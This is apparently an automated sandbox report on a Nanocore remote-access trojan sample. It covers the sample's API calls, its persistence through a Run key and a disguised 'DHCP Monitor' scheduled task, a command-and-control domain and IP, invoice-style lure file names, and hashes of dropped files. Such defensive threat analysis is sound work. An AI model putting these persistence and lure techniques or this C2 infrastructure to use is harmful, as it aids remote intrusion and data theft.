        Source: RegSvcs.exe, 0000000E.00000002.784850073.0000000006D6C000.00000004.00000010.sdmpBinary or memory string: $mProgram Manager
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_001A9D99
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001AE34B cpuid 0_2_001AE34B
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_001ACBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_001ACBB8
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_0084E284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,8_2_0084E284
        Source: C:\Users\user\33920049\mmuiqlcvwo.pifCode function: 8_2_008A2BF9 GetUserNameW,8_2_008A2BF9
        Source: C:\Users\user\Desktop\YdACOWCggQ.exeCode function: 0_2_0019A995 GetVersionExW,0_2_0019A995

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara matchFile source: Process Memory Space: mmuiqlcvwo.pif PID: 5828, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6240, type: MEMORYSTR
        Source: mmuiqlcvwo.pifBinary or memory string: WIN_XP
        Source: mmuiqlcvwo.pifBinary or memory string: WIN_XPe
        Source: mmuiqlcvwo.pifBinary or memory string: WIN_VISTA
        Source: mmuiqlcvwo.pif.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
        Source: mmuiqlcvwo.pifBinary or memory string: WIN_7
        Source: mmuiqlcvwo.pifBinary or memory string: WIN_8

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: mmuiqlcvwo.pif, 00000008.00000003.300093094.0000000004364000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 0000000E.00000002.783237000.0000000004829000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RAT
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif, Code function: 8_2_0089C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif, Code function: 8_2_008A65D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
        Source: C:\Users\user\33920049\mmuiqlcvwo.pif, Code function: 8_2_00894EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,

        Mitre Att&ck Matrix

        | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
        | Valid Accounts 2 | Native API 1 | DLL Side-Loading 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | Input Capture 31 | System Time Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
        | Default Accounts | Command and Scripting Interpreter 2 | Valid Accounts 2 | DLL Side-Loading 1 | Deobfuscate/Decode Files or Information 11 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Input Capture 31 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
        | Domain Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Valid Accounts 2 | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 2 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
        | Local Accounts | At (Windows) | Logon Script (Mac) | Access Token Manipulation 21 | Software Packing 12 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap |  | Carrier Billing Fraud |
        | Cloud Accounts | Cron | Network Logon Script | Process Injection 312 | DLL Side-Loading 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 1 | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings |
        | Replication Through Removable Media | Launchd | Rc.common | Scheduled Task/Job 1 | Masquerading 11 | Cached Domain Credentials | Security Software Discovery 121 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 21 | Jamming or Denial of Service |  | Abuse Accessibility Features |
        | External Remote Services | Scheduled Task | Startup Items | Startup Items | Valid Accounts 2 | DCSync | Virtualization/Sandbox Evasion 31 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact |
        | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion 31 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue |
        | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 21 | /etc/passwd and /etc/shadow | Application Window Discovery 11 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction |
        | Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 312 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact |
        | Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop |

        Behavior Graph

        [Figure: behavior graph. Behavior Graph ID: 501907, Sample: YdACOWCggQ.exe, Startdate: 13/10/2021, Architecture: WINDOWS, Score: 100]

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        | Source | Detection | Scanner | Label |
        | YdACOWCggQ.exe | 35% | Virustotal |  |

        Dropped Files

        | Source | Detection | Scanner | Label |
        | C:\Users\user\33920049\mmuiqlcvwo.pif | 27% | Virustotal |  |
        | C:\Users\user\33920049\mmuiqlcvwo.pif | 32% | ReversingLabs |  |
        | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | Virustotal |  |
        | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | Metadefender |  |
        | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 0% | ReversingLabs |  |

        Unpacked PE Files

        | Source | Detection | Scanner | Label |
        | 14.2.RegSvcs.exe.6290000.8.unpack | 100% | Avira | TR/NanoCore.fadte |
        | 14.2.RegSvcs.exe.1300000.1.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 |

        Domains

        | Source | Detection | Scanner | Label |
        | ezeani.duckdns.org | 1% | Virustotal |  |

        URLs

        | Source | Detection | Scanner | Label |
        | http://secure.globalsign.net/cacert/PrimObject.crt0 | 0% | URL Reputation | safe |
        | http://secure.globalsign.net/cacert/ObjectSign.crt09 | 0% | URL Reputation | safe |
        | http://www.globalsign.net/repository09 | 0% | URL Reputation | safe |
        | ezeani.duckdns.org | 1% | Virustotal |  |
        | ezeani.duckdns.org | 0% | Avira URL Cloud | safe |
        | 194.5.98.48 | 1% | Virustotal |  |
        | 194.5.98.48 | 0% | Avira URL Cloud | safe |
        | http://www.globalsign.net/repository/0 | 0% | URL Reputation | safe |
        | http://www.globalsign.net/repository/03 | 0% | URL Reputation | safe |

        Domains and IPs

        Contacted Domains

        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
        | ezeani.duckdns.org | 194.5.98.48 | true | true |  | unknown |

        Contacted URLs

        | Name | Malicious | Antivirus Detection | Reputation |
        | ezeani.duckdns.org | true | 1%, Virustotal; Avira URL Cloud: safe | unknown |
        | 194.5.98.48 | true | 1%, Virustotal; Avira URL Cloud: safe | unknown |

        URLs from Memory and Binaries

        | Name | Source | Malicious | Antivirus Detection | Reputation |
        | http://secure.globalsign.net/cacert/PrimObject.crt0 | mmuiqlcvwo.pif.0.dr | false | URL Reputation: safe | unknown |
        | http://secure.globalsign.net/cacert/ObjectSign.crt09 | mmuiqlcvwo.pif.0.dr | false | URL Reputation: safe | unknown |
        | http://www.globalsign.net/repository09 | mmuiqlcvwo.pif.0.dr | false | URL Reputation: safe | unknown |
        | http://www.autoitscript.com/autoit3/0 | mmuiqlcvwo.pif.0.dr | false |  | high |
        | http://www.globalsign.net/repository/0 | mmuiqlcvwo.pif.0.dr | false | URL Reputation: safe | unknown |
        | http://www.globalsign.net/repository/03 | mmuiqlcvwo.pif.0.dr | false | URL Reputation: safe | unknown |

          Contacted IPs


          Public

          | IP | Domain | Country | ASN | ASN Name | Malicious |
          | 194.5.98.48 | ezeani.duckdns.org | Netherlands | 208476 | DANILENKODE | true |

          Private

          IP
          192.168.2.1

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:501907
          Start date:13.10.2021
          Start time:11:58:25
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 14m 34s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:YdACOWCggQ.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:34
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@10/36@23/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 23.6% (good quality ratio 22.4%)
          • Quality average: 74.6%
          • Quality standard deviation: 28.1%
          HCA Information:
          • Successful, ratio: 55%
          • Number of executed functions: 170
          • Number of non-executed functions: 211
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          • Override analysis time to 240s for rundll32
          Warnings:
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, rundll32.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 95.100.216.89, 20.49.157.6, 20.82.209.183, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60
          • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes were analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.

          Simulations

          Behavior and APIs

          | Time | Type | Description |
          | 11:59:55 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Windows element C:\Users\user~1\33920049\MMUIQL~1.PIF C:\Users\user~1\33920049\fmkkelc.omp |
          | 12:00:00 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0) |
          | 12:00:00 | API Interceptor | 1890x Sleep call for process: RegSvcs.exe modified |

          Joe Sandbox View / Context

          IPs

          | Match | Associated Sample Name / URL | Detection | Context |
          | 194.5.98.48 | Import order764536.xlsx | malicious |  |
          | 194.5.98.48 | Bill of Lading, Invoice, & Packing LIsts.exe | malicious |  |
          | 194.5.98.48 | Quotation Price - Double R Trading b.v.exe | malicious |  |
          | 194.5.98.48 | Nizi International S.A. #New Order.exe | malicious |  |
          | 194.5.98.48 | DHL Import Clearance #U2013 Consignment #6225954602.exe | malicious |  |
          | 194.5.98.48 | soa5.exe | malicious |  |
          | 194.5.98.48 | soa5.exe | malicious |  |
          | 194.5.98.48 | PO SKP 149684.jar | malicious |  |
          | 194.5.98.48 | TECHNICAL OFFERS.exe | malicious |  |
          | 194.5.98.48 | 17New P.O_signed.exe | malicious |  |

          Domains

          | Match | Associated Sample Name / URL | Detection | Context |
          | ezeani.duckdns.org | Import order764536.xlsx | malicious | 194.5.98.48 |

          ASN

          | Match | Associated Sample Name / URL | Detection | Context |
          | DANILENKODE | Import order764536.xlsx | malicious | 194.5.98.48 |
          | DANILENKODE | swift.Telex.xls | malicious | 194.5.98.95 |
          | DANILENKODE | details.vbs | malicious | 194.5.98.206 |
          | DANILENKODE | TWAueCcfK3.exe | malicious | 194.5.98.107 |
          | DANILENKODE | DHL_1012617429350,pdf.exe | malicious | 194.5.97.16 |
          | DANILENKODE | Enquiry- 0076HGF21.exe | malicious | 194.5.98.141 |
          | DANILENKODE | DHL_1012617429350,pdf.exe | malicious | 194.5.97.16 |
          | DANILENKODE | 1012617429350,pdf.exe | malicious | 194.5.97.16 |
          | DANILENKODE | AWB# 2617429350,pdf.exe | malicious | 194.5.97.16 |
          | DANILENKODE | Product-inquiry6243424243_PDF.exe | malicious | 194.5.98.211 |
          | DANILENKODE | Charter Details.vbs | malicious | 194.5.98.184 |
          | DANILENKODE | VHp0AIIlQG.exe | malicious | 194.5.98.107 |
          | DANILENKODE | Product-inquiry6243424243PDF.exe | malicious | 194.5.98.211 |
          | DANILENKODE | Yeni Sipari#U015f # 765-3523663, pdf.exe | malicious | 194.5.97.16 |
          | DANILENKODE | Nuevo pedido _WJO-001,pdf.exe | malicious | 194.5.97.16 |
          | DANILENKODE | 765-3523663 ,pdf.exe | malicious | 194.5.97.16 |
          | DANILENKODE | Zhgafxcfrzzlbcdvuklhrmxvmcufzxktju.exe | malicious | 194.5.98.145 |
          | DANILENKODE | Zhgafxcfrzzlbcdvuklhrmxvmcufzxktju.exe | malicious | 194.5.98.145 |
          | DANILENKODE | Yfqbmuahufznqznknlmwfrtnauqppwcobt.exe | malicious | 194.5.98.145 |
          | DANILENKODE | BIOBARICA OC CVE6535 TVOP-MIO 10(C) 2021,pdf..exe | malicious | 194.5.97.25 |

          JA3 Fingerprints

          No context

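          Dropped Files

          | Match | Associated Sample Name / URL | Detection | Context |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Swift copy.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | KRSEL0000056286.JPG.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | tT5M57z8XiwLwf5.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | SecuriteInfo.com.Suspicious.Win32.Save.a.7200.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Purchase order.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 21ITQXL080104122T7.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | COSCOSH SHANGHAI SHIP MANAGEMENT CO LTD.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | 319-7359-01#U00a0BL#U00a0DRAFT.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | HSBc20210216B1.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | BANK INFORMATION.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | PO.2100002.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | dorlla.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | dAkJsQr7A9.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | QT2021154 NCX Glasurit Rev.1.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Order specification & Drawing_PDF.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | payment.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | SWIFT CODE.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | SWIFT CODE.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | TRANSFER REQUEST FORM.exe | malicious |  |
          | C:\Users\user\AppData\Local\Temp\RegSvcs.exe | swift code.exe | malicious |  |
          | C:\Users\user\33920049\mmuiqlcvwo.pif | Import order764536.xlsx | malicious |  |
          | C:\Users\user\33920049\mmuiqlcvwo.pif | KRSEL0000056286.JPG.exe | malicious |  |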

                                                                          Created / dropped Files

                                                                          C:\Users\user\33920049\aauo.exe
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):512
                                                                          Entropy (8bit):5.6047097806645825
                                                                          Encrypted:false
                                                                          SSDEEP:12:o9RRQXCGiB+IGihOZEkUYz8laDkucQq1wA3RT8jTW:oPRuCh8OEZEdwkucZ1w2T8jS
                                                                          MD5:3A48081CF7D4D709399A376B3A8AADF2
                                                                          SHA1:E0D7DDAA464FC3565D92DF4ECC7BD30286D519CA
                                                                          SHA-256:7EBB903522348C2326DFFBC66B5D20C8E7C120C4D7CEE15640CAE5187C5741C0
                                                                          SHA-512:4B0077AD1E29FC4C7703B7525167ABB1A80E409D7E4685EA977689B3DE12CF5CFA02BB843D62E1EA391F18FF4C609D66262116E01B52C59616E3A266F0E40726
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          C:\Users\user\33920049\abjtjj.gcm
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):416786
                                                                          Entropy (8bit):4.0000117868606
                                                                          Encrypted:false
                                                                          SSDEEP:6144:vq8GcfPnL6mYkonW8inBO9SEmDafe/kgtwIf:vecfPemYZWJs9NmDaW8gmG
                                                                          MD5:1E44C5E2D839F53AC114916DFA41912B
                                                                          SHA1:9B67ABC94E2959683B5D784C8B076D6171AF7237
                                                                          SHA-256:0FB93824D410F1E4BA2B233F405027D042EDF2E729FA34A41BE910B50ED99416
                                                                          SHA-512:14895D2F67585415D7D25807BBA20F6AA8C142E8DD3483ED8E10F4280820CD0849EE828E3134BEAF4A90FB8E41C9C524DF01547330DFD3928470B3EEB95946A1
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\aricevnrq.msc
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):605
                                                                          Entropy (8bit):5.421101092464615
                                                                          Encrypted:false
                                                                          SSDEEP:12:/wP7JBvQ76cFT1DeNWO+9EjcJujbW/e8Rz9ZoPgIA6+1mpkfwLD:/gJBQzF0NWlvmEeYBmgI7+1qLD
                                                                          MD5:AE35EB6B3B57EEB5BED5821AA2E6D92D
                                                                          SHA1:9D8C94DEF5AE1D05D727E19EFF0A55917094DD67
                                                                          SHA-256:565B05521D79388A417C7210739CFC5EB4F8E41E50D0D76D6710FE7533FF4B98
                                                                          SHA-512:7A1F352907FA7D9BA4B414331EF15B9CDE5949744CA7BB47EF5AE68D03391512E80308DF06B82B4FF54746C3A06EF9A2E590CE7331BC9107EB66CE257F73FB63
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\bbofcjswrb.bmp
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):510
                                                                          Entropy (8bit):5.395393519734533
                                                                          Encrypted:false
                                                                          SSDEEP:12:gIhpZX8zRyjfRafC1Pmu/r6V7w5TSKocSZVjjkrK+zlEVBIy:gIhpV89ESeFp2xVjAG+zl0BF
                                                                          MD5:152ACD87F50B620928B85D1F6EA00588
                                                                          SHA1:5A704ED20090C635BC28A71A343FFF741F482D06
                                                                          SHA-256:B8F8B30B8BFDFE6E4EBA9D663264F8DE1FEC9A94B1530E0DC13001953324DDEE
                                                                          SHA-512:CB312CF46E681121EF1B75F723405FC5A0C243AD44E027F115DDF578E8B639B080127FA133FE69D3367983CEA1677879276F3BABD89B5DD904F5528545E4C6E2
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\dngb.txt
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):628
                                                                          Entropy (8bit):5.539990812470243
                                                                          Encrypted:false
                                                                          SSDEEP:12:WEMHRgaG7Oq6Rypby91dT2XV8vyy9SqSOQn9KtzFwTPSMJw7PYV7xy:DMx1G7SRyRE1dSFtyYZiGTPSMq7PK1y
                                                                          MD5:7F801B2F630068DE6D4B7F9358261246
                                                                          SHA1:9F1FA78880CC820B11BF4F50FAF02B47E717F0B8
                                                                          SHA-256:2BDC81B1E28470666DB0FB6E23AA590C4B9CA2E251170DEB506FAD164B8ADD4A
                                                                          SHA-512:5C0CAD366569BD1B221ADD033A111A2A5B17A117CB199BA3DBCDE4BFD6F2038815E8EFED40FADCA9D805A63CEC0CC8BD12CF6F50C1BD57F9AFC991E5F25AEAA5
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\dopnobhqej.xml
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):574
                                                                          Entropy (8bit):5.3882957771470705
                                                                          Encrypted:false
                                                                          SSDEEP:12:IynViaAcFBLGDlBRqNZJC2Q/nrsAF6eCyh3kOIiEuP8G:WcfMYw2OrMd+3kOpEPG
                                                                          MD5:9F6E0D61C826AC091CD857D118713477
                                                                          SHA1:327C7FD7ED8AA08C09C104FFC7BA15894C25424A
                                                                          SHA-256:44269193851D3CEA2ABBADCD4DF83DEF02397189A74E239D0719D9D2F69BA8FC
                                                                          SHA-512:63038CB3D42BA8A0C20957F2D67719217FE00A6A85EDB18C837F4779160AE65B32F3D7BEA9814CCD02CB90CF92B8027C20D2524647C66CC36B31B9FC45C98D1B
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\dwipjhaqq.jpg
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):565
                                                                          Entropy (8bit):5.568775268532097
                                                                          Encrypted:false
                                                                          SSDEEP:12:puQF5w4r+LqEcY2/ioIPKtpzzFgOv+7rg0/ScUocADn2:wQ3rrDwoIymO2YrcyAa
                                                                          MD5:A36CB4828F8264BF744ABAA2F8842B53
                                                                          SHA1:1E0B2BF80891B29BD078129A90364B14ED95EE57
                                                                          SHA-256:1F7F52165714243C75171CCDA40E5E0C66F8B6EEE59C2F224B9C5033A7D32FE0
                                                                          SHA-512:4032EA58CFB0B2A1B333D306A43AF6F1BE6FF8342F09F22AFC6072F601C903174D8CBA893C71984AC7814548B27C6B3CC4FFF5C046408E96C96397CD4003B057
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\eeppjmhbj.icm
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):593
                                                                          Entropy (8bit):5.516485008605424
                                                                          Encrypted:false
                                                                          SSDEEP:12:Xo6hrLh4fvDosoUkZajbPcdHcOgRsSHesaKEQWSTdoT6rQpWvn:X5rL6/oEbPcFcOgG6esafShz6Wvn
                                                                          MD5:4050A7160604551C4CB625F60086536C
                                                                          SHA1:4110CAFA390AE23E74DC5B110CE98F0C3B342CF2
                                                                          SHA-256:8AE0F3572F5B03EFA9C93C88E62F61DF4C59341817BD5E883E7B0D48A82B2346
                                                                          SHA-512:75335BDE6AE3B4D4DA060FB425E02965B62CB6DCBB52EEA6F52CC071AFA8ADBD0176687230123F850FB6D097ED36357ED283C2707ED15006E5719AA24CD5883B
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\egwevtj.xl
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):570
                                                                          Entropy (8bit):5.5477291315599615
                                                                          Encrypted:false
                                                                          SSDEEP:12:/kIF2BqahGlKUEq4YCQeFq20TD6QlfkL8GCuKLB6wWem+HixRnoQ84qsK84:sIlEdltFb93L8Gwqe/0oHP84
                                                                          MD5:B8B1C71088CA6B30B3029554CE05CEF8
                                                                          SHA1:67D1C180AA7C8B079819F9013828827947456D29
                                                                          SHA-256:A5FC7DBE940C698DE68E900516AE4EA33BC7B7AB2435C0D5B74E9E474A58A09E
                                                                          SHA-512:C262AC053268459F8800BF3F7BD219E0C0DFA063D12D1EF96D563EE60F337C99AA0FC69496A535975A0B682AA732C0C1741D2748D4ED783E2C2E0D0ECA65D01F
                                                                          Malicious:false
                                                                          C:\Users\user\33920049\ewkvwqles.xl
                                                                          Process:C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):545
                                                                          Entropy (8bit):5.527751285637128
                                                                          Encrypted:false
                                                                          SSDEEP:12:enqYhOyfzX8x2nPPegEhlSDu30ExDkHHiD/Gn0:uqYhpfAxSGhlSy30ExKH6O0
                                                                          MD5:A7864C4D1F211A09CB7BCDB60FC1BB9C
                                                                          SHA1:06CD14C958FA5C0870C3148BCD874208D6EBA192
                                                                          SHA-256:D3BEFD3CD87AA43091B2043616C0D57B5DD5C86A9BBB933BC7F1CE359FDF2848
